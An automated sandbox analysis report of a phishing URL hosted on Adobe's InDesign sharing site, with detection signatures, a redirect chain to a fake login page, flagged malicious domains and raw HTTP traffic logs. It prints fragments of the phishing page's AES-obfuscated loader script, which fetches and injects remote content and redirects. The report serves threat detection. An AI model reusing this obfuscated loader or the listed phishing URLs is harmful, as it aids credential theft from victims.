Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1

Overview

General Information

Sample URL:https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1
Analysis ID:1501906
Infos:

Detection

HTMLPhisher
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
Yara detected HtmlPhish70
AI detected landing page (webpage, office document or email)
HTML page contains hidden URLs
HTML page contains suspicious javascript code
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 7088 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6368 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5036 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6596 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6668 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_646JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    SourceRuleDescriptionAuthorStrings
    11.10.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
      11.14.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        No Sigma rule has matched
        Timestamp:2024-08-30T18:17:16.784573+0200
        SID:2014025
        Severity:1
        Source Port:50437
        Destination Port:443
        Protocol:TCP
        Classtype:Exploit Kit Activity Detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://quantumspirel.ru/#faqAvira URL Cloud: Label: malware
        Source: https://quantumspirel.ru/#servicesAvira URL Cloud: Label: malware
        Source: https://quantumspirel.ru/#modern-supercarsAvira URL Cloud: Label: malware
        Source: https://quantumspirel.ru/#contactAvira URL Cloud: Label: malware
        Source: https://quantumspirel.ru//Avira URL Cloud: Label: malware

        Phishing

        barindex
        Source: Yara matchFile source: 11.14.pages.csv, type: HTML
        Source: Yara matchFile source: 11.10.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_646, type: DROPPED
        Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.htmlHTTP Parser: https://quantumspirel.ru///2242.php
        Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.htmlHTTP Parser: window.location.href = atob(
        Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.htmlHTTP Parser: async function babysat(babysitting) { <!-- <span>the joy of driving is in the journey, not just the arrival.</span> --> var {a,b,c,d} = json.parse(babysitting); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function dace() {iambus.hidden = 0;gaff.hidden = 1; document.write(await babysat(await (await fetch(await babysat(atob(`eyjhijoiwtbkejdyvfjjrkdnzjdia2jhs3kyddlhxc9ddhbwewxwdefocdlubzkxrdq9iiwiyyi6imywndywzmfmyzexyju0ymyzy2eznjq3zjq5mzg0njfiiiwiyii6ija1owm1zmvlymm4ndc0owi0zgjmnzfimzgyztm1zdyxogrhmzk4n2ezm2jlmtblmwnlmmewytk1zdkzyzlhmdjimzy2odq3mzvlmme5y2m1yjhjytewnwjjnwjlntk2ntm0ogm2mmy1ymi2ztjhmdm3mzy5yze2owy3njcyotgzote2mtgxmtnhoty1ymvlmmvkztlmnzjkmzkznja3zgiymtk5mwq2nzq4mtjlztjmnwezm2u0nmy3njk5nzyzmti0ogq5nzizndmxzwjkogrkzjy2zwqwmwfkmmy5nzi0otmzmtu0yjlhnwrkzty5n2vjnzq2mwe2mtk5...
        Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.htmlHTTP Parser: Number of links: 0
        Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.htmlHTTP Parser: Total embedded image size: 45708
        Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.htmlHTTP Parser: Base64 decoded: {"a":"Y0dz7rTRcFGgf7HkbaKy2t9a\/CtpVylptAhp9no91D4=","c":"f0460fafc11b54bf3ca3647f4938461b","b":"059c5feebc84749b4dbf71b382e35d618da3987a33be10e1ce2a0a95d93c9a02b36684735e2a9cc5b8ca105bc5be5965348c62f5bb6e2a037369c169f767298391618113a965bee2ede9f72d393607...
        Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.htmlHTTP Parser: Title: User login does not match URL
        Source: https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1HTTP Parser: No favicon
        Source: https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1HTTP Parser: No favicon
        Source: https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1HTTP Parser: No favicon
        Source: https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1HTTP Parser: No favicon
        Source: https://pblc.me/pub/40f029dddc28e3HTTP Parser: No favicon
        Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.htmlHTTP Parser: No favicon
        Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.htmlHTTP Parser: No favicon
        Source: https://www.capterra.com/p/145471/Publicate/HTTP Parser: No favicon
        Source: https://www.capterra.com/p/145471/Publicate/HTTP Parser: No favicon
        Source: https://reviews.capterra.com/search/HTTP Parser: No favicon
        Source: https://reviews.capterra.com/search/HTTP Parser: No favicon
        Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.htmlHTTP Parser: No <meta name="author".. found
        Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.htmlHTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49725 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49916 version: TLS 1.2

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2014025 - Severity 1 - ET EXPLOIT_KIT Probable Scalaxy exploit kit Java or PDF exploit request : 192.168.2.5:50437 -> 172.67.73.236:443
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: global trafficHTTP traffic detected: GET /ajax/libs/modernizr/2.8.3/modernizr.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /unav/1.2/UniversalNav.css HTTP/1.1Host: prod.adobeccstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/modernizr/2.8.3/modernizr.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
        Source: global trafficHTTP traffic detected: GET /en_US/sdk.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://indd.adobe.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /en_US/sdk.js?hash=cfe36e7e683e5528b12db8f17a4d3eaa HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://indd.adobe.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /en_US/sdk.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /en_US/sdk.js?hash=cfe36e7e683e5528b12db8f17a4d3eaa HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kMW+XwGzpduof8w&MD=2eL+Va3Y HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /nr-spa-1215.min.js HTTP/1.1Host: js-agent.newrelic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /nr-spa-1215.min.js HTTP/1.1Host: js-agent.newrelic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=15404&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1&be=3120&fe=14688&dc=7338&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1725034532666,%22n%22:0,%22f%22:3,%22dn%22:448,%22dne%22:448,%22c%22:448,%22s%22:449,%22ce%22:1211,%22rq%22:1211,%22rp%22:2667,%22rpe%22:2668,%22dl%22:2674,%22di%22:5839,%22ds%22:7337,%22de%22:7338,%22dc%22:14686,%22l%22:14687,%22le%22:14691%7D,%22navigation%22:%7B%7D%7D&fp=7402&fcp=7877&jsonp=NREUM.setToken HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=15404&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1&be=3120&fe=14688&dc=7338&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1725034532666,%22n%22:0,%22f%22:3,%22dn%22:448,%22dne%22:448,%22c%22:448,%22s%22:449,%22ce%22:1211,%22rq%22:1211,%22rp%22:2667,%22rpe%22:2668,%22dl%22:2674,%22di%22:5839,%22ds%22:7337,%22de%22:7338,%22dc%22:14686,%22l%22:14687,%22le%22:14691%7D,%22navigation%22:%7B%7D%7D&fp=7402&fcp=7877&jsonp=NREUM.setToken HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4a13c21de71e3a5f
        Source: global trafficHTTP traffic detected: GET /events/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=16315&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4a13c21de71e3a5f
        Source: global trafficHTTP traffic detected: GET /events/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=25436&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4a13c21de71e3a5f
        Source: global trafficHTTP traffic detected: GET /pub/40f029dddc28e3 HTTP/1.1Host: pblc.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /i/600x315x9.coords.DO.25,038402457757297x0-74,9615975422427x100/7c758/66cd5c5f19c3010c7f1c2f4d_pdf-real-logo.jpg HTTP/1.1Host: img.pblc.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /i/300x0x8.f.DOST/x/created_in_publicate.png HTTP/1.1Host: img.pblc.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pblc.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /i/300x0x8.f.DOST/x/created_in_publicate.png HTTP/1.1Host: img.pblc.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /i/600x315x9.coords.DO.25,038402457757297x0-74,9615975422427x100/7c758/66cd5c5f19c3010c7f1c2f4d_pdf-real-logo.jpg HTTP/1.1Host: img.pblc.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /OFF13244785676887437647647874876473768.html HTTP/1.1Host: pub-e1c6f3d85d51402790227684363ac52c.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/e7cf9275f425/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
